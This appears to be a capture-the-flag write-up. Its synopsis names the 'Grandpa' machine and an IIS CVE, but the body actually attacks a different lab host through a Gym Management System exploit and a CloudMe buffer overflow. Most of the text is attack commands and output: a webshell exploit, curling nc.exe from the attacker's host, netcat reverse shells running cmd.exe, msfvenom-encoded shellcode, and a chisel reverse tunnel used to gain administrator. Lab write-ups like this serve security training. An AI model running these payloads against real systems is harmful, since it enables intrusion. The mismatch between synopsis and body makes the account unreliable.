From the HackTheBox
SYNOPSISGrandpa is one of the simpler machines on Hack The Box, however it covers the widely-exploitedCVE-2017-7269. This vulnerability is trivial to exploit and granted immediate access to thousandsof IIS servers around the globe when it became public knowledge.
Enumeration
# Nmap 7.80 scan initiated Fri Sep 25 20:44:58 2020 as: nmap -sV -sC -Pn -oA nmap --script vuln 10.10.10.198 Nmap scan report for 10.10.10.198 Host is up (0.34s latency). Not shown: 999 filtered ports PORT STATE SERVICE VERSION 8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6) |_clamav-exec: ERROR: Script execution failed (use -d to debug) | http-csrf: | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.198 | Found the following possible CSRF vulnerabilities: | | Path: http://10.10.10.198:8080/ | Form id: | Form action: include/process_login.php | | Path: http://10.10.10.198:8080/facilities.php | Form id: | Form action: include/process_login.php | | Path: http://10.10.10.198:8080/packages.php | Form id: | Form action: include/process_login.php | | Path: http://10.10.10.198:8080/about.php | Form id: | Form action: include/process_login.php | | Path: http://10.10.10.198:8080/contact.php | Form id: | Form action: include/process_login.php | | Path: http://10.10.10.198:8080/index.php | Form id: |_ Form action: include/process_login.php |_http-dombased-xss: Couldn't find any DOM based XSS. | http-enum: |_ /icons/: Potentially interesting folder w/ directory listing |_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6 | http-slowloris-check: | VULNERABLE: | Slowloris DOS attack | State: LIKELY VULNERABLE | IDs: CVE:CVE-2007-6750 | Slowloris tries to keep many connections to the target web server open and hold | them open as long as possible. It accomplishes this by opening connections to | the target web server and sending a partial request. By doing so, it starves | the http server's resources causing Denial Of Service. | | Disclosure date: 2009-09-17 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750 |_ http://ha.ckers.org/slowloris/ |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. |_http-trace: TRACE is enabled |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug) | vulners: | cpe:/a:apache:http_server:2.4.43: | CVE-2010-0425 10.0 https://vulners.com/cve/CVE-2010-0425 | CVE-1999-1412 10.0 https://vulners.com/cve/CVE-1999-1412 | CVE-1999-1237 10.0 https://vulners.com/cve/CVE-1999-1237 | CVE-1999-0236 10.0 https://vulners.com/cve/CVE-1999-0236 | CVE-2009-1955 7.8 https://vulners.com/cve/CVE-2009-1955 | CVE-2007-6423 7.8 https://vulners.com/cve/CVE-2007-6423 | CVE-2007-0086 7.8 https://vulners.com/cve/CVE-2007-0086 | CVE-2020-11984 7.5 https://vulners.com/cve/CVE-2020-11984 | CVE-2009-3095 7.5 https://vulners.com/cve/CVE-2009-3095 | CVE-2007-4723 7.5 https://vulners.com/cve/CVE-2007-4723 | CVE-2009-1891 7.1 https://vulners.com/cve/CVE-2009-1891 | CVE-2009-1890 7.1 https://vulners.com/cve/CVE-2009-1890 | CVE-2008-2579 6.8 https://vulners.com/cve/CVE-2008-2579 | CVE-2007-5156 6.8 https://vulners.com/cve/CVE-2007-5156 | CVE-2020-9490 5.0 https://vulners.com/cve/CVE-2020-9490 | CVE-2014-0231 5.0 https://vulners.com/cve/CVE-2014-0231 | CVE-2011-1752 5.0 https://vulners.com/cve/CVE-2011-1752 | CVE-2010-1452 5.0 https://vulners.com/cve/CVE-2010-1452 | CVE-2010-0408 5.0 https://vulners.com/cve/CVE-2010-0408 | CVE-2009-2699 5.0 https://vulners.com/cve/CVE-2009-2699 | CVE-2007-0450 5.0 https://vulners.com/cve/CVE-2007-0450 | CVE-2005-1268 5.0 https://vulners.com/cve/CVE-2005-1268 | CVE-2003-0020 5.0 https://vulners.com/cve/CVE-2003-0020 | CVE-2001-1556 5.0 https://vulners.com/cve/CVE-2001-1556 | CVE-1999-0678 5.0 https://vulners.com/cve/CVE-1999-0678 | CVE-1999-0289 5.0 https://vulners.com/cve/CVE-1999-0289 | CVE-1999-0070 5.0 https://vulners.com/cve/CVE-1999-0070 | CVE-2009-1195 4.9 https://vulners.com/cve/CVE-2009-1195 | CVE-2020-11993 4.3 https://vulners.com/cve/CVE-2020-11993 | CVE-2011-1783 4.3 https://vulners.com/cve/CVE-2011-1783 | CVE-2010-0434 4.3 https://vulners.com/cve/CVE-2010-0434 | CVE-2008-2939 4.3 https://vulners.com/cve/CVE-2008-2939 | CVE-2008-2168 4.3 https://vulners.com/cve/CVE-2008-2168 | CVE-2008-0455 4.3 https://vulners.com/cve/CVE-2008-0455 | CVE-2007-6420 4.3 https://vulners.com/cve/CVE-2007-6420 | CVE-2007-6388 4.3 https://vulners.com/cve/CVE-2007-6388 | CVE-2007-5000 4.3 https://vulners.com/cve/CVE-2007-5000 | CVE-2007-4465 4.3 https://vulners.com/cve/CVE-2007-4465 | CVE-2007-1349 4.3 https://vulners.com/cve/CVE-2007-1349 | CVE-2007-6422 4.0 https://vulners.com/cve/CVE-2007-6422 | CVE-2007-6421 3.5 https://vulners.com/cve/CVE-2007-6421 |_ CVE-2001-0131 1.2 https://vulners.com/cve/CVE-2001-0131 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Fri Sep 25 20:51:08 2020 -- 1 IP address (1 host up) scanned in 370.35 seconds I found port 8080 is open.
Local Privilege Escalation
I searched gym in metasploit and found 48506.py.
$ searchsploit gym [i] Found (#1): /home/ikkyu/exploitdb/files_exploits.csv [i] To remove this message, please edit "/home/ikkyu/exploitdb/.searchsploit_rc" for "files_exploits.csv" (package_array: exploitdb) [i] Found (#1): /home/ikkyu/exploitdb/files_shellcodes.csv [i] To remove this message, please edit "/home/ikkyu/exploitdb/.searchsploit_rc" for "files_shellcodes.csv" (package_array: exploitdb) -------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path -------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Gym Management System 1.0 - Unauthenticated Remote Code Execution | php/webapps/48506.py WordPress Plugin WPGYM - SQL Injection | php/webapps/42801.txt ------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results I run this.
$ python ~/exploitdb/exploits/php/webapps/48506.py http://10.10.10.198:8080/ /\ /vvvvvvvvvvvv \--------------------------------------, `^^^^^^^^^^^^ /============BOKU=====================" \/ [+] Successfully connected to webshell. C:\xampp\htdocs\gym\upload> C:\xampp\htdocs\gym\upload> whoami �PNG � buff\shaun Now I got the machine. Next we neet to upload nc.exe to upgrade shell.
At local machine:
$ python -m http.server 8000 Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... At target machine:
C:\xampp\htdocs\gym\upload> curl http://10.10.14.6:8000/nc.exe -o nc.exe �PNG � C:\xampp\htdocs\gym\upload> dir �PNG � Volume in drive C has no label. Volume Serial Number is A22D-49F7 Directory of C:\xampp\htdocs\gym\upload 22/12/2020 12:04 <DIR> . 22/12/2020 12:04 <DIR> .. 22/12/2020 12:04 53 kamehameha.php 22/12/2020 11:40 38,616 nc.exe 2 File(s) 38,669 bytes 2 Dir(s) 7,315,296,256 bytes free I succeeded in uploading.
Now we can get a reverse shell.
At local machine:
rlwrap nc -lvnp 4444 Listening on 0.0.0.0 4444 At target machine:
C:\xampp\htdocs\gym\upload> nc.exe 10.10.14.6 4444 -e cmd.exe At local machine:
rlwrap nc -lvnp 4444 Listening on 0.0.0.0 4444 Connection received on 10.10.10.198 49682 Microsoft Windows [Version 10.0.17134.1610] (c) 2018 Microsoft Corporation. All rights reserved. C:\xampp\htdocs\gym\upload> I got a reverse shell.
Administrator Privilege Escalation
I checked process.
C:\xampp\htdocs\gym\upload>tasklist tasklist Image Name PID Session Name Session# Mem Usage ========================= ======== ================ =========== ============ System Idle Process 0 0 8 K System 4 0 44 K Registry 104 0 7,392 K smss.exe 368 0 384 K csrss.exe 456 0 3,856 K wininit.exe 532 0 4,608 K csrss.exe 540 1 3,452 K winlogon.exe 604 1 8,888 K services.exe 676 0 8,296 K lsass.exe 696 0 12,072 K svchost.exe 812 0 2,520 K fontdrvhost.exe 836 0 13,900 K fontdrvhost.exe 844 1 8,100 K svchost.exe 860 0 22,724 K svchost.exe 956 0 12,036 K svchost.exe 1004 0 6,028 K dwm.exe 328 1 41,676 K svchost.exe 360 0 8,292 K svchost.exe 948 0 7,100 K svchost.exe 996 0 9,664 K svchost.exe 1076 0 18,084 K svchost.exe 1136 0 18,504 K svchost.exe 1208 0 5,984 K svchost.exe 1280 0 5,680 K svchost.exe 1380 0 8,672 K svchost.exe 1388 0 10,612 K svchost.exe 1408 0 4,044 K svchost.exe 1416 0 7,352 K svchost.exe 1516 0 9,604 K svchost.exe 1552 0 12,944 K Memory Compression 1564 0 30,132 K svchost.exe 1592 0 7,004 K svchost.exe 1676 0 6,028 K svchost.exe 1772 0 5,036 K svchost.exe 1780 0 5,792 K svchost.exe 1824 0 6,956 K svchost.exe 1880 0 8,588 K svchost.exe 1988 0 6,180 K svchost.exe 1456 0 6,364 K svchost.exe 1336 0 7,044 K svchost.exe 1240 0 4,432 K svchost.exe 2060 0 7,564 K svchost.exe 2132 0 9,108 K svchost.exe 2284 0 5,600 K spoolsv.exe 2300 0 12,040 K svchost.exe 2424 0 6,124 K svchost.exe 2736 0 7,660 K svchost.exe 2748 0 14,036 K svchost.exe 2760 0 19,308 K svchost.exe 2768 0 3,696 K svchost.exe 2756 0 4,532 K vmtoolsd.exe 2788 0 18,696 K svchost.exe 2796 0 13,656 K svchost.exe 2804 0 15,532 K SecurityHealthService.exe 2832 0 13,048 K MsMpEng.exe 2864 0 169,640 K VGAuthService.exe 2880 0 7,840 K svchost.exe 2980 0 7,080 K svchost.exe 2052 0 9,868 K svchost.exe 3104 0 9,768 K svchost.exe 3144 0 3,568 K dllhost.exe 3660 0 11,308 K WmiPrvSE.exe 3848 0 14,188 K msdtc.exe 2720 0 8,132 K svchost.exe 4540 0 30,464 K sihost.exe 4596 1 21,576 K svchost.exe 4620 1 11,716 K svchost.exe 4672 1 24,212 K taskhostw.exe 4768 1 9,896 K svchost.exe 4932 0 5,548 K ctfmon.exe 4992 1 10,796 K svchost.exe 5080 0 5,848 K svchost.exe 5092 0 11,500 K NisSrv.exe 5212 0 7,268 K WmiPrvSE.exe 5276 0 18,888 K explorer.exe 5716 1 79,172 K svchost.exe 5776 0 16,212 K svchost.exe 5796 0 11,372 K svchost.exe 5960 0 5,312 K svchost.exe 6000 0 12,380 K svchost.exe 5444 0 4,852 K svchost.exe 4416 0 4,976 K ShellExperienceHost.exe 1048 1 51,772 K SearchUI.exe 6360 1 118,800 K RuntimeBroker.exe 6588 1 16,452 K ApplicationFrameHost.exe 6780 1 26,996 K MicrosoftEdge.exe 7072 1 55,284 K browser_broker.exe 7160 1 6,876 K svchost.exe 6316 0 4,668 K Windows.WARP.JITService.e 4404 0 3,380 K RuntimeBroker.exe 4356 1 5,012 K MicrosoftEdgeCP.exe 4220 1 18,920 K RuntimeBroker.exe 4464 1 13,908 K MicrosoftEdgeCP.exe 2672 1 21,300 K svchost.exe 7332 0 11,264 K conhost.exe 7464 0 1,008 K SearchIndexer.exe 8140 0 23,680 K MSASCuiL.exe 7424 1 6,812 K vmtoolsd.exe 5748 1 13,220 K httpd.exe 1712 0 460 K mysqld.exe 7716 0 3,480 K svchost.exe 2572 0 3,636 K svchost.exe 5304 1 14,224 K httpd.exe 1460 0 9,188 K svchost.exe 6552 0 12,824 K SgrmBroker.exe 2296 0 2,704 K svchost.exe 8248 0 6,984 K CompatTelRunner.exe 1104 0 632 K conhost.exe 8608 0 1,216 K svchost.exe 7788 0 8,192 K Microsoft.Photos.exe 2528 1 5,240 K RuntimeBroker.exe 3856 1 12,252 K WinStore.App.exe 8424 1 26,440 K RuntimeBroker.exe 4556 1 5,240 K SystemSettings.exe 7764 1 32,228 K svchost.exe 5984 0 4,748 K svchost.exe 7484 0 9,652 K taskhostw.exe 5920 1 20,872 K taskhostw.exe 3520 0 23,440 K CompatTelRunner.exe 1548 0 2,428 K conhost.exe 8792 0 9,736 K TrustedInstaller.exe 1016 0 5,524 K svchost.exe 196 0 5,352 K TiWorker.exe 2148 0 103,996 K svchost.exe 8784 0 7,844 K svchost.exe 6488 0 3,792 K svchost.exe 8596 0 11,860 K cmd.exe 7204 0 2,432 K conhost.exe 9176 0 9,132 K nc.exe 7192 0 5,436 K cmd.exe 4504 0 3,988 K cmd.exe 708 0 3,208 K conhost.exe 2452 0 10,868 K CloudMe.exe 3496 0 26,884 K timeout.exe 5968 0 3,920 K tasklist.exe 8796 0 7,772 K I found CloudMe.exe. CloudMe is known to be vulnerable. I searched cloudme in metasploit.
$ searchsploit cloudme --------------------------------------------------- --------------------------------- Exploit Title | Path --------------------------------------------------- --------------------------------- CloudMe 1.11.2 - Buffer Overflow (PoC) | windows/remote/48389.py CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASL | win ws/local/48499.txt CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASL | windows/local/48840.py Cloudme 1.9 - Buffer Overflow (DEP) (Metasplo | windows_x86-64/remote/45197.rb CloudMe Sync 1.10.9 - Buffer Overflow (SEH)(D | windows_x86-64/local/45159.py CloudMe Sync 1.10.9 - Stack-Based Buffer Over | windows/remote/44175.rb CloudMe Sync 1.11.0 - Local Buffer Overflow | windows/local/44470.py CloudMe Sync 1.11.2 - Buffer Overflow + Egghu | windows/remote/46218.py CloudMe Sync 1.11.2 Buffer Overflow - WoW64 ( | windows_x86-64/remote/46250.py CloudMe Sync < 1.11.0 - Buffer Overflow | windows/remote/44027.py CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) | windows_x86-64/remote/44784.py --------------------------------------------------- --------------------------------- Shellcodes: No Results I found 48389.py. I searched about this on exploit-db.
Now we need to modify this code a bit and remote port forwarding on the target machine.You can see from the exploit-db that the default is to launch the calculator.
I created payload. Here, the port is set to 4445, but it can be anything.
$ msfvenom -a x86 -p windows/exec CMD='C:\xampp\htdocs\gym\upload\nc.exe 10.10.14.28 4445 -e cmd.exe' -b '\x00\x0A\x0D' -f python -v payload [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload Found 11 compatible encoders Attempting to encode payload with 1 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 273 (iteration=0) x86/shikata_ga_nai chosen with final size 273 Payload size: 273 bytes Final size of python file: 1452 bytes payload = b"" payload += b"\xda\xcf\xd9\x74\x24\xf4\xbe\xe3\xce\xa2\x54\x5a" payload += b"\x29\xc9\xb1\x3e\x31\x72\x19\x83\xea\xfc\x03\x72" payload += b"\x15\x01\x3b\x5e\xbc\x47\xc4\x9f\x3d\x27\x4c\x7a" payload += b"\x0c\x67\x2a\x0e\x3f\x57\x38\x42\xcc\x1c\x6c\x77" payload += b"\x47\x50\xb9\x78\xe0\xde\x9f\xb7\xf1\x72\xe3\xd6" payload += b"\x71\x88\x30\x39\x4b\x43\x45\x38\x8c\xb9\xa4\x68" payload += b"\x45\xb6\x1b\x9d\xe2\x82\xa7\x16\xb8\x03\xa0\xcb" payload += b"\x09\x22\x81\x5d\x01\x7d\x01\x5f\xc6\xf6\x08\x47" payload += b"\x0b\x32\xc2\xfc\xff\xc9\xd5\xd4\x31\x32\x79\x19" payload += b"\xfe\xc1\x83\x5d\x39\x39\xf6\x97\x39\xc4\x01\x6c" payload += b"\x43\x12\x87\x77\xe3\xd1\x3f\x5c\x15\x36\xd9\x17" payload += b"\x19\xf3\xad\x70\x3e\x02\x61\x0b\x3a\x8f\x84\xdc" payload += b"\xca\xcb\xa2\xf8\x97\x88\xcb\x59\x72\x7f\xf3\xba" payload += b"\xdd\x20\x51\xb0\xf0\x35\xe8\x9b\x9e\xc8\x7e\xa6" payload += b"\xed\xca\x80\xa9\x41\xa2\xb1\x22\x0e\xb5\x4d\xe1" payload += b"\x6a\x49\x04\xa8\xdb\xc1\xc1\x38\x5e\x8c\xf1\x96" payload += b"\x9d\xa8\x71\x13\x5e\x4f\x69\x56\x5b\x14\x2d\x8a" payload += b"\x11\x05\xd8\xac\x86\x26\xc9\xee\x12\x84\x8a\x91" payload += b"\x0f\x44\x1b\x0e\xb8\xd0\xbf\xc1\x5b\x6b\x1c\x79" payload += b"\xe5\xe6\xc0\xf0\x65\x94\x97\x9b\xe1\x38\x06\x3f" payload += b"\xc4\xa5\xae\xda\x38\x14\x7f\x0b\x08\x66\x51\x62" payload += b"\x5e\xa8\x9f\xbc\xbe\x80\xeb\x88\x8b\xc8\x3e\x94" payload += b"\xd3\x6b\x2c\x32\x3a\x0e\xd6\xdf\x42" Replace the payload part of 48389.py.
Next, we need to upload chisel.exe to remote port forwarding as before. After uploading,at local machine:
$ chisel server -p 1234 -reverse -v 2021/01/07 17:33:38 server: Reverse tunnelling enabled 2021/01/07 17:33:38 server: Fingerprint Wf5cpZzaVbfNXiWNsUT8AEcLYgEeOI7r3U440nagv08= 2021/01/07 17:33:38 server: Listening on http://0.0.0.0:1234 At target machine:
C:\xampp\htdocs\gym\upload>chisel.exe client -v 10.10.14.28:1234 R:8888:127.0.0.1:8888 --keepalive:1000 chisel.exe client -v 10.10.14.28:1234 R:8888:127.0.0.1:8888 --keepalive:1000 2021/01/07 07:31:30 client: Connecting to ws://10.10.14.28:1234 2021/01/07 07:31:30 client: tun: proxy#1000=>--keepalive:1000: Listening 2021/01/07 07:31:30 client: tun: Bound proxies 2021/01/07 07:31:31 client: Handshaking... 2021/01/07 07:31:33 client: Sending config 2021/01/07 07:31:33 client: Connected (Latency 336.4421ms) 2021/01/07 07:31:33 client: tun: SSH connected Now start a netcat listener on 4445 and execute the pyload on the second terminal.
$ nc -lnvp 4445 Listening on 0.0.0.0 4445 Connection received on 10.10.10.198 49686 Microsoft Windows [Version 10.0.17134.1610] (c) 2018 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami buff\administrator We got the admin.
Top comments (1)
Ouch! How do you mitigate?